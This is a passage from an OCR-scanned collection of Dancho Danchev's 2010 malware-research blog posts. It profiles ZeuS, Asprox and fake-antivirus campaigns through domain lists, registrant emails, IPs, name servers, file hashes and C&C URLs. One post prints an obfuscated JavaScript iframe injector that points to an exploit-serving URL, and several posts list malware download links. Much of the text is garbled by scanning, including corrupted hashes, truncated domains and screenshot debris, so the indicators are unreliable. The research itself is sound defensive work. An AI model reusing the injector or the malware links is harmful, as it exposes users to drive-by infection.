nsi.macrotub.com 81.2.208.0/22 ———AS-ps AS24806 


N 


ns1.roundstorm.com as 81.2.210.98 - 


A 98.210. forpsi.net 
nsl.tanspice.com 


nsL.tightsales.com 
nsl.treecorn.ru 
ns2.illmap.ru 
ns2,labelstare.ru 
ns2.mushylion.ru 


ns2.online-drugshop.com 


Client-side exploitation is taking place through, for instance, crystalrobe.ru: 8080/in- 
dex.php?pid=14 and hillchart.com: 8080/index.php?pid=14. As seen in previous campaigns, 
this one is also sharing an identical directory structure, such as: 

malicious-domain.com :8080/index.php?pid=2 

malicious-domain.com :8080/Notes1.pdf (Notes1-to-Notes10.pdf) 

malicious-domain.com :8080/NewGames.jar 

malicious-domain.com :8080/Games.jar 

malicious-domain.com :8080/Applet1.html (Applet1-to-Applet10.html) 
malicious-domain.com :8080/welcome.php?id=6 &pid=1 &hello=503 


crystalrobe.ru :8080/index.php?pid=14 
crystalrobe.ru :8080/jquery.jxx?v=5.3.4 
crystalrobe.ru :8080/new/controller.php 
crystalrobe.ru :8080/js.php 
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crystalrobe.ru :8080/welcome.php?id=6 &pid=1 &hello=503 
crystalrobe.ru :8080/welcome.php?id=0 &pid=1 


Client-side exploits serving domains (94.23.231.140; 91.121.115.208; 


94.23.224.221; 94.23.229.220) part of the campaign: 
applecorn.com - Email: es@qx8.ru 

areadrum.com - Email: qx@freenetbox.ru 
busyspade.com - Email: baffle@freenetbox.ru 
cafemack.com - Email: soy@qx8.ru 

clanday.com - Email: elope@fastermail.ru 
dnsofthost.com - Email: depot@infotorrent.ru 
drunkjeans.com - Email: runway@5mx.ru 
earlymale.com - Email: amply@maillife.ru 
galslime.com - Email: soy@qx8.ru 


94.23.11.38; 
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gigasofa.com - Email: grind@fastermail.ru 
hillchart.com - Email: soy@qx8.ru 
hugejar.com - Email: runway@5mx.ru 
ionicclock.com - Email: kin@maillife.ru 
lasteye.com - Email: amply@maillife.ru 
luckysled.com - Email: kin@maillife.ru 
macrotub.com - Email: dodge@5mx.ru 
oldgoal.com - Email: kin@maillife.ru 
outerrush.com - Email: amply@maillife.ru 
quietzero.com - Email: grind@fastermail.ru 
radiomum.com - Email: es@qx8.ru 
roundstorm.com - Email: es@qx8.ru 
sadute.com - Email: grind@fastermail.ru 
sheepbody.com - Email: es@qx8.ru 
shinytower.com - Email: cord@maillife.ru 
splatspa.com - Email: elopoe@fastermail.ru 
tanspice.com - Email: dodge@5mx.ru 
tanyear.com - Email: grind@fastermail.ru 
tightsales.com - Email: runway@5mx.ru 
tuneblouse.com - Email: es@qx8.ru 
validplan.com - Email: dodge@5mx.ru 
waxyblock.com - Email: cord@maillife.ru 
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hugejar.com 


com 


dy.com 


oldgoal.com 
validplan.com 
tanspice.com 


tuneblouse. 
hillc 
af 


allnext.ru - Email: swipe@maillife.ru 
barnsoftware.ru - Email: people@bigmailbox.ru 
bestbidline.ru - Email: jody@fastermail.ru 
bestexportsite.ru - Email: orphan@qx8.ru 
bittag.ru - Email: tips@freenetbox.ru 
boozelight.ru - Email: ole@bigmailbox.ru 
brandnewnet.ru - Email: orphan@qx8.ru 
cangethelp.ru - Email: liver@freenetbox.ru 
chainjoke.ru - Email: ole@bigmailbox.ru 
comingbig.ru - Email: swipe@maillife.ru 
countypath.ru - Email: liver@freenetbox.ru 
crystalrobe.ru - Email: people@bigmailbox.ru 
cupjack.ru - Email: tips@freenetbox.ru 
dealyak.ru - Email: people@bigmailbox.ru 
eyesong.ru - Email: tips@freenetbox.ru 
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familywater.ru - Email: ole@bigmailbox.ru 
funsitedesigns.ru - Email: orphan@qx8.ru 
galneed.ru - Email: people@bigmailbox.ru 
girllab.ru - Email: tips@freenetbox.ru 
greedford.ru - Email: ole@bigmailbox.ru 
guntap.ru - Email: tips@freenetbox.ru 
heroguy.ru - Email: ole@bigmailbox.ru 
homecarenation.ru - Email: orphan@qx8.ru 
homesitecam.ru - Email: orphan@qx8.ru 
hookdown.ru - Email: crag@maillife.ru 
horsedoctor.ru - Email: ole@bigmailbox.ru 
jarpub.ru - Email: ole@bigmailbox.ru 
liplead.ru - Email: ole@bigmailbox.ru 
livesitedesign.ru - Email: orphan@qx8.ru 
mansbestsite.ru - Email: orphan@qx8.ru 
marketholiday.ru - Email: people@bigmailbox.ru 
metalspice.ru - Email: ole@bigmailbox.ru 
mingleas.ru - Email: crag@maillife.ru 
motherfire.ru - Email: people@bigmailbox.ru 
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motherfire.ru 
panlip.ru 


tintie.ru 
jarpub.ru 
chainjoke.ru 
girllab.ru 
metalspice.ru 
crystalrobe.ru 
greedford.ru 
sisterqueen.ru 
bittag.ru 


cupj 
guntap.ru 
problemdollars.ru 


tor.ru 


ight.ru 
d.ru 
u 


jarpub.ru 


musicbestway.ru - Email: jody@fastermail.ru 
musicsiteguide.ru - Email: crag@maillife.ru 
netbesthelp.ru - Email: liver@freenetbox.ru 
netwebinternet.ru - Email: dibs@freemailbox.ru 
newagedirect.ru - Email: orpbhan@qx8.ru 
newhomelady.ru - Email: orphan@qx8.ru 
newinfoworld.ru - Email: orpohan@qx8.ru 
newworldunion.ru - Email: orphan@qx8.ru 
ourfreesite.ru - Email: orphan@qx8.ru 
panlip.ru - Email: tips@freenetbox.ru 
pantscow.ru - Email: ole@bigmailbox.ru 
problemdollars.ru - Email: people@bigmailbox.ru 
raceobject.ru - Email: people@bigmailbox.ru 
silencepill.ru - Email: ole@bigmailbox.ru 
sisterqueen.ru - Email: ole@bigmailbox.ru 
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slaveday.ru - Email: ole@bigmailbox.ru 
stareastwork.ru - Email: next@fastermail.ru 
superblenderworld.ru - Email: crag@maillife.ru 
superhoppie.ru - Email: soft@bigmailbox.ru 
supertruelife.ru - Email: edsel@fastermail.ru 
superwestcoast.ru - Email: crag@maillife.ru 
theantimatrix.ru - Email: ole@bigmailbox.ru 
tintie.ru - Email: swipe@maillife.ru 
topmediasite.ru - Email: tips@freenetbox.ru 
treecorn.ru - Email: tips@freenetbox.ru 
trueblueally.ru - Email: soft@bigmailbox.ru 
trueblueberyl.ru - Email: soft@bigmailbox.ru 
tunemug.ru - Email: tips@freenetbox.ru 
ushead.ru - Email: crag@maillife.ru 
westbendonline.ru - Email: edsel@fastermail.ru 
yaktrack.ru - Email: ole@bigmailbox.ru 
yournewonline.ru - Email: orpohan@qx8.ru 
yourtolltag.ru - Email: orphan@qx8.ru 
yourtruecrime.ru - Email: soft@bigmailbox.ru 
zooneed.ru - Email: ole@bigmailbox.ru 


3560 


h1424534_stratoservernet 


ns4.areadrum.com 


ns4.cafemack.com 


ns4.clanday.com 


A 
ns4.dnsofthostcom 
netemymnele.com 85.214.0.0/16 ——AS-pe As6724 
“ N 
ns4.eyesong.ru A 85.214.29.9 _ 


d A zodev.nl 


ns4.galslime.com 


ns4.macrotub.com 


ns4.roundstorm.com 


ns4.tanspice.com 


ns4.tightsales.com 


ns4.treecom.ru 


Name servers of notice: 
nsl.dnsofthost.com - 81.2.210.98 
ns2.dnsofthost.com - 194.79.88.121 
ns3.dnsofthost.com - 67.223.233.101 
ns4.dnsofthost.com - 85.214.29.9 


The NAUNET-REG-RIPN domain registrar, although, having already registered over a [1]100 
ZeuS crimeware friendly domains, there’s little chance they'll take action. Updates, including 
take down/remediation actions will be posted as soon as they emerge. 


This post has been reproduced from [2]Dancho Danchev’s blog. Follow him 
[3]Jon Twitter. 


1. https: //zeustracker.abuse.ch/monitor. php?registrar=NAUNET-REG-RIP 


2. http: //ddanchev.blogspot.com/ 
3. http://twitter.com/danchodanche 
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6.7.6 Dissecting the Xerox WorkCentre Pro Scanned Document Themed Campaign 
(2010-07-19 20:26) 


p 
® automatic Updates (ne—| 


ty System Security Pack Upgrade 


Update 


System Security Pack 2010.56.111 (Antimalware Doctor Upgrade; KB921528) 


Details 


Thank you For your interest in obtaining updates From our site. - 
To use this site, you must be running Microsoft Internet Explorer 5 or later. 

To upgrade to the latest version of the browser, go to the Internet Explorer Downloads 

<http: igo. microsoft.com/Fwlink/?linkID=24748> website, 

IF you prefer to use a different web browser, you can obtain updates from the Microsoft 

Download Center <http://qo.microsoft.com/Fwlink/?linkid=10678> or you can stay up to 

date with the latest critical and security updates by using Automatic Updates. To turn on 

Automatic Updates: 

Click Start, and then click Control Panel. ’ 


Over the weekend, a "Scan from a Xerox WorkCentre Pro" themed malware campaign re- 
lying on zip archives, was actively spamvertised by cybecriminals seeking to infect gullible 
end/corporate users. 


What’s particularly interesting about this campaign, is the cocktail of malware dropped 
on infected hosts, including Asprox sample ([1] Money Mule Recruiters use ASProx’s Fast 
Fluxing Services ), and two separate samples of Antimalware Doctor. 


- Sample subject: Scan from a Xerox WorkCentre Pro $9721130 
- Sample message: "Please open the attached document. It was scanned and sent to you 
using a Xerox WorkCentre Pro. 


Sent by: Guest 
Number of Images: 1 
Attachment File Type: ZIP [DOC] 


WorkCentre Pro Location: machine location not set Device Name: 
XRX2090AA7ACDB45466972. For more information on Xerox products and solutions, please 
visit http://www.xerox.com" 


- Detection rates: 

- [2]Xerox _docl.exe - Trojan.Win32.Jorik.Oficla.bb - Result: 34/42 (80.96 %) 
File size: 30926 bytes 

MD5...: 1d378a6bc94d5b5a702026d31c21e242 

SHA1..: 545e83f547d05664cd6792e254b87539fba24eb9 
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- [3]Xerox _doc2.exe - Trojan.Win32.Jorik.Oficla.ba - Result: 34/42 (80.96 %) 
File size: 43520 bytes 

MD5...: 829c86d4962f186109534b669ade47d7 

SHA1..: 5d3d02d0f6ce87cd96a34b73dc395460d623616e 


The samples then phone’ back to the _ Oficla/Sasfis C &Cs_ at _ hulej- 
soops.ru/images/bb.php?v=200 &id=554905388 &b=avpsales &tm=3 - 91.216.215.66, 
AS51274 - Email: mxx3@yandex.ru which periodically rotates three different executables 
using the following URLs: 


0815.ch /pic/view.exe 


curseri.ch /pictures/securedupdaterfix717.exe 
regionalprodukte-beo.ch /about/cgi.exe 


353book.com 


353dianying.com 
353ls.com 


353zhuti.com 
—NET ge 59.52.0.0/14 ——AS-pe as4i34 


coolzone88.com 
hfl588.com 
nemohuildifsd.ru 


russianmomds.ru 


Backup URLS: 

leeitpobbod.ru/image/bb.php - 59.53.91.195, AS4134 - Email: mxx3@yandex.ru - dead 
response 

loloohuildifsd.ru/image/bb.php - 68.168.222.158 - Email: mxx3@yandex.ru - dead response 
nemohuildifsd.ru/image/bb.php - 59.53.91.195 (nemohuildiin.ru, russianmomds.ru), AS4134 
- Email: mxx3@yandex.ru - dead response 


Let’s take a peek at the samples found within the C &C. 


[4]view.exe - Trojan.Win32.Jorik.Aspxor.e - Result: 11/42 (26.2 %) 
File size: 79360 bytes 
MD5...: 5d296felef7bf67f36fe9adb209398ee 
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SHAI1..: 41645bcd241cd97b72d7866d13c4a0eb6bf6a0ee 


o/s ET: 
eval (function (p,a,c,k,e,d) {e=function (c) {return (c<a?'"':e (parseInt (c/a)))+((c=cta 
)>35?7String. fromCharCode (c+29):c.toString(36)) };if(!*'. replace (/*/, String) ) {whil 
e (c--) {d[e (c) ]=k[c] | |e (c) }k=[function (e) {return 
d[{e] }] ;e=function() {return'\\wt’ };c=1};while (c--) {if (k[c]) {p=p. replace (new 
RegExp("\\b'te(c)+"\\b",'g'),k[c]) }}return p}('3 7=h.g("S=") ;i(7!=-1)(}3(3 2=1 
£();2.k(2.m() +d*1*4*4%c) >9.b="S=a;2="42.v()sn(9.y ("<8 x=A://B.z:w/q.p?0=6 r=0 
s=0 
u=0></8>") }t (e) (}}',38,38,"| |expires|var|60|update_ssl||start|iframe| document |up 
date|cookie|1000/|24/| |Date|indexOf| cookieString|if|else|setTime|new| getTime|try|p 
id| php| index|width|height|catch|frameborder|toGMTString|8080|src|write|rulhttpla 
ccesspad'.split ("|'),0,{})) 


Upon execution, the sample phones back to well known Asprox C &Cs: 
[5]cl63amgstart.ru: 80/board.php 


- 91.213.217.4, AS42473 - Email: ssal@yandex.ru 
[6]hypervmsys.ru: 80/board.php - 89.149.223.232 (hostagents.ru), AS28753 - Email: 
vadim.rinatovich@yandex.ru 
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Previously, all of the following ASPRox domains used exclusively for massive SQL injections, 


used to respond to 91.213.217.4: 


webservicesbba.ru - Email: anrnews@mail.ru 
webservicelupa.ru - Email: anrnews@mail.ru 
webserivcekota.ru - Email: anrnews@mail.ru 
webservicesrob.ru - Email: anrnews@mail.ru 
webserivcezub.ru - Email: anrnews@mail.ru 
webserviceforward.ru - Email: anrnews@mail.ru 
webserivcessh.ru - Email: anrnews@mail.ru 
webservicesmulti.ru - Email: anrnews@mail.ru 
webservicezok.ru - Email: anrnews@mail.ru 
webservicebal.ru - Email: anrnews@mail.ru 
webservicefull.ru - Email: anrnews@mail.ru 
webservicessl.ru - Email: anrnews@mail.ru 
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webserviceaan.ru - Email: anrnews@mail.ru 
webservicedevlop.ru - Email: anrnews@mail.ru 
webserviceftp.ru - Email: anrnews@mail.ru 
hypervmsys.ru - Email: anrnews@mail.ru 
webserviceget.ru - Email: anrnews@mail.ru 
webserviceskot.ru - Email: anrnews@mail.ru 
clé3amgstart.ru - Email: ssal@yandex.ru 
ml63amgstart.ru - Email: ssa21@yandex.ru 
webservicesttt.ru - Email: anrnews@mail.ru 
webservicenow.ru - Email: anrnews@mail.ru 
webservicekuz.ru - Email: anrnews@mail.ru 


Currently, the gang’s migrating this infrastructure to 109.196.134.58, AS39150, VLTELECOM- 
AS VLineTelecom LLC Moscow, Russia. 


All of these domains+subdomains sharing the same js.js directory structure, which upon 
visiting loads URLs such as (accesspad.ru :8080/index.php?pid=6) with the rest of the do- 
mains sharing the same infrastructure as the ones profiled in "[7]Spamvertised Amazon 
"Verify Your Email", "Your Amazon Order" Malicious Emails" post: 


access.webservicebal.ru 
admin.webserivcekota.ru 
api.webserivcessh.ru 
app.webserviceforward.ru 
app.webservicesrob.ru 
base.webserviceftp.ru 
batch.webserviceaan.ru 
batch.webservicebal.ru 
bios.webservicesbba.ru 
block.webserviceaan.ru 
block.webservicesrob.ru 
cache.webservicesbba.ru 
cache.webservicesmulti.ru 
chk.webservicezok.ru 
cmdid.webserivcezub.ru 
code.webservicesbba.ru 
com.webserivcekota.ru 
com.webservicedevlop.ru 
ddk.webservicesrob.ru 
default.webservicezok.ru 
diag.webserviceftp.ru 
direct.webserviceftp.ru 
dil.webservicelupa.ru 
drv.webservicebal.ru 
drv.webservicesrob.ru 
encode.webservicefull.ru 
err.webserivcessh.ru 
export.webservicedevlop.ru 
ext.webserviceaan.ru 
ext.webservicesbba.ru 
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file.webserivcekota.ru 
file.webserivcessh.ru 
filter. webservicedevlop.ru 
font.webservicelupa.ru 
gdi.webserviceftp.ru 
get.webservicesbba.ru 
go.webserivcekota.ru 
go.webservicefull.ru 
guid.webserivcezub.ru 
hostid.webservicesbba.ru 
hostid.webservicesmulti.ru 


http.webserviceforward.ru 
icmp.webservicesbba.ru 
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id.webserivcezub.ru 
inf.webserviceaan.ru 
info.webservicedevlop.ru 
ini.webservicesrob.ru 
ioctl.webservicedevlop.ru 
kernel.webservicezok.ru 
lan.webservicefull.ru 
lan.webservicesbba.ru 
lib.webservicebal.ru 
lib.webserviceftp.ru 
libid.webservicelupa.ru 
load.webservicebal.ru 
locate.webservicelupa.ru 
log.webservicelupa.ru 
log.webservicezok.ru 
log-in.webservicessl.ru 
manage.webservicesbba.ru 
map.webserivcezub.ru 
map.webservicedevlop.ru 
media.webserviceftp.ru 
mode.webservicelupa.ru 
net.webservicebal.ru 
netapi.webserviceaan.ru 
netmsg.webserivcezub.ru 
ns1.webservicelupa.ru 
ns2.webservicelupa.ru 
ntdll.webservicessl.ru 
ntio.webservicelupa.ru 
ntio.webservicezok.ru 
obj.webservicesbba.ru 
object.webserivcessh.ru 
object.webservicesmulti.ru 
oem.webservicebal.ru 
offset.webservicefull.ru 
ole.webservicesbba.ru 
org.webservicesrob.ru 
page.webserviceaan.ru 
parse.webservicebal.ru 
peer.webserviceaan.ru 
pic.webservicesbba.ru 
pool.webservicelupa.ru 
port.webservicebal.ru 
port.webservicesbba.ru 
port.webservicessl.ru 
proc.webserviceaan.ru 
proc.webservicessl.ru 
rdir.webserviceftp.ru 
redir.webservicedevlop.ru 
refer.webserivcezub.ru 
reg.webserviceaan.ru 
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remote.webservicessl.ru 
run.webserivcekota.ru 
script.webserivcezub.ru 
sdk.webserivcezub.ru 
search.webserviceaan.ru 
search.webservicedevlop.ru 
setup.webserivcezub.ru 
setup.webservicezok.ru 
snmp.webserviceforward.ru 
snmp.webservicesrob.ru 
ssicom.webserivcessh.ru 
ssicom.webservicesrob.ru 
sslid.webserivcekota.ru 
ssInet.webservicedevlop.ru 
svc.webservicedevlop.ru 
tag.webservicebal.ru 
tag.webservicessl.ru 
tid.webserviceftp.ru 
time.webservicelupa.ru 
udp.webserviceftp.ru 
udp.webservicezok.ru 
update.webserviceftp.ru 
update.webservicefull.ru 
url.webservicesbba.ru 
url.webservicezok.ru 
vba.webservicesrob.ru 
vbs.webservicelupa.ru 
ver.webserivcekota.ru 
webserivcekota.ru 
webserivcessh.ru 
webserivcezub.ru 
webserviceaan.ru 
webservicebal.ru 
webservicedevlop.ru 
webserviceforward.ru 
webserviceftp.ru 
webservicefull.ru 
webserviceget.ru 
webservicelupa.ru 
webservicesmulti.ru 
webservicesrob.ru 
webservicessl.ru 
webservicezok.ru 
win.webservicezok.ru 
xml.webservicefull.ru 
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Antimalware Doctor y 


Getting back to the samples rotated by the original campaign binary, and their detection rates, 


Infections on your PC can cause: 
A System slowdown and crash 
ZX, Unwanted advertising displaying 
A Loss of Internet connections 
A Lost documents and settings 
A 


Major data loss 


Threat Name 
System1060 
SearchPixieBar 
InterFun 
Win32.Autoit.E 
Win32.Downloader.... 
SearchAndBrowse 
Netvision 

FM. Toolbar 
ClickFinders 
SpyPC 

TTW 


| Type 


Brow... 
Hijacker 
Dialer 
Trojan 
Trojan 
BHO}... 
Dialer 
Hijacker 
Track... 
Keylo... 
Dialer 
Malw... 


| Level 


High 
High 
Medium 
High 
High 
High 
Medium 
High 
Medium 
High 
Medium 
Medium 


Your system is infected! 16 dangerous objects have been found during last 
system scan. It is strongly recommended to remove them immediately. 


Description =) 
Set of files that do ever 

SearchPixieBar installs a 
Upon clicking ‘enter’, a v4 
Win32.Auton.E copies 4 
This trojan horse poses 
Installs 4 new toolbar up 
The dialer connects to € 


FM. Toolbar installs a to 

Their cookie itself is a tre 

Warning! Website links t 

To activate by phone 2 

Macrosoft installs eee 
> 


You need registered version of Antimalware Doctor to remove these infections. Click “Register Now” to 
activate protection and eliminate these security hazards. 


continue unprotected 


network interactions. 


- Detection rates: 
- [8]securedupdaterfix717.exe - Trojan.Win32.FakeYak - Result: 22/42 (52.39 %) 
File size: 36864 bytes 
MD5...: cd16d4c998537248e6d4d0a3d51ca6de 

SHA1..: 7e36efOce85facl18ecffd5a82566352ce0322589 


Phones back to: 


s.Idwn.in/inst.php?fff=7071710000 &saf=ru - 


[9]AS6851 - Email: feliciachappell@ymail.com 


bootfree.in/ 


MainModule717release10000.exe_ - 


sstats.in), AS43134 - Email: feliciachappell@ymail.com 


s.wordmeat.in/install.php?coid= 


pell@ymail.com 
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91.188.60.236, 


91.188.60.236 


194.8.250.207 


(updget.in; 


[10]AS6851 


(flowload.in:; 


Email: 


wordmeat.in), 
lessown.in; 


feliciachap- 


) Antimalware Doctor 


 Antimalware on 


Help protect your A 


a Seculity status System scan 
Scan & fix your computer 
Scan type: @ Quick eI 
j System scan | IE a 


i 
5 
Fi 


| Type | Description Threat Level 


@ Check for updates System1060 Browser hija... Set of files that do everyt.. High 
MM SearchPixieBar Hijacker SearchPixieBar installs a... High 
© InterFun Dialer Upon clicking ‘enter’, a wi... Medium 
F MM Win32.Autoite Trojan Win32,Autoit.E copies a... High 
{6} Settings  Win32.Downloader.wzip32_ Trojan This trojan horse poses a... High 
SearchAndBrowse BHO/Hijacker — Installs anew toolbar up... High 
—Netvision Dialer The dialer connects to ex... Medium 
MFM. Toobar Hijacker FM. Toobar installs a tool... High 
M  ClickFinders Tracking coo... Their cookie itself is a tra... Medium 
MM SpyPc Keylogger Warning! Website links to... High 
TTW Dialer To activate by phone 25... Medium 
 Macrosoft Malware Macrosoft installs itself in... Medium 
t< U N LOC "4 Last scan summary Remove Threats 
ULL VERSION Objects scanned: 458 
Threats detected: 16 
Removed/healed: 0 


easy one-click registration 


- Detection rate for MainModule717release10000.exe 

- [11]MainModule717release10000.exe - Trojan:Win32/FakeYak - Result: 26/42 (61.90 %) 
File size: 1043968 bytes 

MD5...: 3c30c62e9981bd86c5897447cb358235 

SHAI...: 36bfc285a61bcb67f2867dd303ac3cefa0e490a0 


Phones back to: 
wordmeat.in - 91.188.60.236 - Email: feliciachappell@ymail.com 
vismake.in - 91.188.60.236 - Email: keelingelizabeth@ymail.com 


- Detection rate for the 3rd binary rotated in the original C &C: 

- [12]cgi.exe - Trojan.Inject.8960 - Result: 6/42 (14.29 %)File size: 62976 bytes 
MD5...: 45c062490e0fc262c181efc323cb83ba 

SHA1..: bff90630f2064d7bcc82b7389c2b8525ff960870 


Phones back to: 
musiceng.ru /music/forum/index1.php - 91.212.127.40, AS49087 - Email: 
ol.feodosoff@yandex.ru 


The whole campaign, is a great example of what cybercrime underground multitasking 
is all about. Moreover, it illustrates the interactions between the usual suspects, with the not 
sO surprising appearance of the already profiled [13]AS6851, BKCNET, Sagade Ltd. 


This post has been reproduced from [14]Dancho Danchev’s blog. Follow him 
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[15]Jon Twitter. 


1, fitep://adanchev. blogspot .con/2008/07 /noney-mule-recruiters-use-asprozs-fast. bial 
2. 
2. 
4. 


5. http: //www.m86security.com/labs/i/The-Asprox-Spambot-Resurrects, trace.1345/,7E.asp 


7. http: //ddanchev. blogspot .com/2010/07/spamvertised-amazon-verify-you-email.htm 
8. ttp://www.virustotal.com/analisis/63d9da362e466e962c7abc9f 8b3d643daf 1e18f£84170cd22bf bd4a595877b18£- 1279 


11, 
12: 
13. 

15, 


6.7.7 ZeuS Crimeware Serving 123Greetings Ecard Themed Campaign in the Wild 
(2010-07-20 23:40) 


12 
Greztings 


FREE GREETINGS FOR THE PLANET ™ 


Ubiquitous social engineering schemes, never fade away. ZeuS crimeware campaigners are 
currently using a 123greetings.com ecard-themed campaign, in an attempt to entice users to 
"enjoy their ecara". 


Subject: "You have received an Greeting eCard" 
Message: "Good day. You have received an eCard 


To pick up your eCard, choose from any of the following options: Click on the following 
link (or copy & paste it into your web browser): matt-levine.com /ecard.exe; secondary 
URL offered: forestarabians.nl /ecard.exe Your card will be aviailable for pick-up beginning 
for the next 30 days. Please be sure to view your eCard before the days are up! We hope 
you enjoy you eCard. Thank You!" 


Detection rate: 

- [l]ecard.exe - Cryp Zbot-12; Trojan/Win32.Vundo - Result: 9/42 (21.43 %) 
File size: 147968 bytes 

MD5...: e6f3aa226bf9733b7e8c07cab339f4dc 
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SHA1..: €983767931900a13b88a615d6c1d3f6ff8fb6b60 


Upon execution, the sample phones back to: 

[2]zephehooqu.ru /bin/koethood.bin - 77.78.240.115, AS42560 - Email: skit@5mx.ru 
[3]jocudaidie.ru /9xq/ gate.php - 118.169.173.218, AS3462 - Email: skit@5mx.ru - FAST- 
FLUXED 


Multiple MD5s are also currently active at zephehooqu.ru. 
Detection rates: 

[4]aimeenei.exe - Win32/Zbot.Cjl - Result: 30/42 (71.43 %) 
File size: 149504 bytes 

MD5...: 096b7e8c4f611f0eb69cfb776f3a0e7e 

SHA1..: 909d7c2740f84599d5e30ffed7261e19ad4a962a 


[5]cahdoigu.exe - Mal/Zbot-U - Result: 27/42 (64.29 %) 
File size: 147968 bytes 

MD5...: 11f9f96c17584a672c2a563744130a46 

SHA1..: £31¢c40c5c766c7628023105be6f004e5322b17b6 


[6]koethood.exe - Troj/Zbot-SW - Result: 30/42 (71.43 %) 
File size: 147968 bytes 

MD5...: da1979227141844be69577f7f31a7309 

SHAI..: 5ada2c390e63ca051c9582fe723384ce52a45912 


[7 ]loobuhai.exe - BKDR QAKBOT.SMB - Result: 33/42 (78.58 %) 
File size: 147968 bytes 

MD5...: df4e19af8c356b3ff810bc52f6081ccc 

SHA1..: d4a1d2f147ae0d24a3eaac66e8d2f9de50cf7a0c 


[8 ]oovaenai.exe - Packed.Win32.Katusha.j - Result: 32/42 (76.2 %) 
File size: 147456 bytes 

MD5...: f0fd5579f06d5b581b5641546ae91d52 

SHAI..: c81fa66c546020f3c1c34a0d1aal191b2d9578f07 


[9]quohthei.exe - Win32/Spy.Zbot.YW - Result: 33/42 (78.58 %) 
File size: 147968 bytes 

MD5...: ffcOd66024f690e875638f4c33ba86fl 

SHAI1..: c958f3426a3e6fedd76b86a5aef16c90915ac539 


[10]sofeigoo.exe - Win32/Spy.Zbot.YW - Result: 31/42 (73.81 %) 
File size: 148992 bytes 

MD5...: 45e98426fafd221ffo7d55ce8alae531 

SHA1..: 8235b3a80ba6611779dfd4db40a48627af7374eb 


[11]teemaeko.exe - PWS:Win32/Zbot.gen!Y - Result: 32/42 (76.2 %) 
File size: 148992 bytes 

MD5...: 9758f04d2f1bd664f37c4285a013372a 

SHA1..: 4273dc48f9aeaf69cb7047c4a882af74479fb635 


[12 ]thaigogo.exe - Win32/Spy.Zbot.YW - Result: 34/42 (80.96 %) 
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File size: 147968 bytes 
MD5...: b667d75f5bb9f23a8ae249f7de4000a5 
SHA1..: 7657783dcf2aeaafbab3407bb608469851d342bb 


[13]ziejaing.exe - Trojan.Zbot.610 - Result: 30/42 (71.43 %) 
File size: 147456 bytes 

MD5...: 7592e957de01e53956517097c0e9ccd8 

SHAI1..: e7c04d2c8c5d4a51e2615a2ee015d87d28655320 


4 


Related .ru cybercrime-friendly domains, sharing fast-flux infrastructure with this campaign’s 
C &C: 

adaichaepo.ru - Email: subtle@maillife.ru 
aroolohnet.ru - Email: brawn@bigmailbox.ru 
dahzunaeye.ru - Email: celia@freenetbox.ru 
esvr3.ru - Email: bender@freenetbox.ru 
hazelpay.ru - Email: owed@bigmailbox.ru 
iesahnaepi.ru - Email: heel@bigmailbox.ru 
iveeteepew.ru - Email: atomic@freenetbox.ru 
jocudaidie.ru - Email: skit@5mx.ru 
ohphahfech.ru - Email: warts@maillife.ru 
railuhocal.ru - Email: celia@freenetbox.ru 
sdlls.ru - Email: vc@bigmailbox.ru 


Name servers of notice within the fast-flux infrastructure: 
nsl.tophitnews.net - 74.122.197.22 - Email: worldchenell@ymail.com 
ns2.tophitnews.net - 173.19.142.57 

nsl.usercool.net - 74.122.197.22 

ns2.usercool.net - 76.22.74.15 

ns1.welcominternet.net - 74.54.82.223 - Email: admin@rangermadeira.com 
ns2.welcominternet.net - 74.54.82.223 

nsl.gamezoneland.com - 188.40.204.158 - Email: xtrail.corpo@gmail.com 
ns2.gamezoneland.com - 174.224.63.18 

ns1.tropic-nolk.com - 188.40.204.158 - Email: greysy@gmx.com 
ns2.tropic-nolk.com - 171.103.51.158 

ns1.interaktivitysearch.net - 202.60.74.39 - Email: ssupercats@yahoo.com 
ns2.interaktivitysearch.net - 202.60.74.39 

nsl1.openworldwhite.net - 202.60.74.39 - Email: xtrail.coro@gmail.com 
ns2.openworldwhite.net - 43.125.79.23 

nsl.helphotbest.net - Email: worldchenell@ymail.com 


It gets even more interesting. 


[14]greysy@gmx.com has already been profiled in an Avalanche botnet campaign using 
[15]TROYAK-AS’s services back then ([16] The Avalanche Botnet and the TROYAK-AS Con- 
nection ), followed by another assessment "[17]TorrentReactor.net Serving Crimeware, 
Client-Side Exploits Through a Malicious Ad" where the same email was also used to register 
a name server part of the fast-flux infrastructure of the ZeuS crimeware’s C &Cs. 
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This post has been reproduced from [18]Dancho Danchev’s blog. Follow him 
[19]on Twitter. 
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14. http://ddanchev. blogspot .com/2010/02/irsphotoarchive-themed-zeusclient-side.htm 


ttp://www.zdnet .com/blog/security/troyak-as-the-cybercrime-friendly-isp-that- just-wont-go-away/5761 


16. 

17. 
18. 

19. 
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6.8 August 


6.8.1 Summarizing Zero Day’s Posts for July (2010-08-02 14:54) 


Zero Day 


Dell ships motherboard with malicious code 


Del has corfirmed that some of £5 PoworESge server motherboards were shepped to customers 


t frmware 


Researchers peek inside a mini ZeuS botnet, find 
60GB of stolen data 


Researchers from AVG take a peek inside 


Mumba, part of Avalanche group's or 


Google tops comparative review of malicious 


search results & ZONet’s White Paper Membership 
Newsletter Stey corrent she tows 
and updates from White 


D ZDNet's Must-Read News Alerts: 
Breaking IT news as it happens 


Hacker breaks into ATMs, dispenses cash 
Here to help you remotely 
with your 
Document 
Management 


Needs 


Jang hor ds re te wd ang pg secunty ho 
if $ utedt da e oF 
»Zometed teller os (ATMs s secur er haced 
Apple patches Safari Auto-Fill security hole 
reo 3 Coed a Major Safari browser x 1S dxumented 
sec reiuding n flaw in + MOF Wed 
rom ‘emture thay an be hacked t ea data fron 


The following is a brief summary of all of my posts at [1]ZDNet’s Zero Day for July, 2010. You 
[2]can also go through [3]previous summaries, as well as subscribe to my [4]personal RSS 
feed, [5]Zero Day’s main feed, or follow me on Twitter: 


Recommended reading: 


¢ [6]Does Microsoft’s sharing of source code with China and Russia pose a security risk? 
¢ [7]Middle East countries: the BlackBerry is a national security threat 


¢ [8]Report: Apple had the most vulnerabilities throughout 2005-2010 
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01. [9]l mage Gallery: June’s cyber threat landscape 

02. [10]The Pirate Bay hacked through multiple SQL injections 

03. [11]Does Microsoft’s sharing of source code with China and Russia pose a security risk? 
04. [12]Report: Apple had the most vulnerabilities throughout 2005-2010 

05. [13]Malware Watch: Malicious Amazon themed emails in the wild 

06. [14]RSA: Banking trojan uses social network as command and control server 
07. [15]Middle East countries: the BlackBerry is a national security threat 

08. [16]l mage Gallery: Avast! Antivirus office in Prague, Czech Republic 

09. [17]lmage Gallery: Introduction to Avast! Antivirus version 5.1 

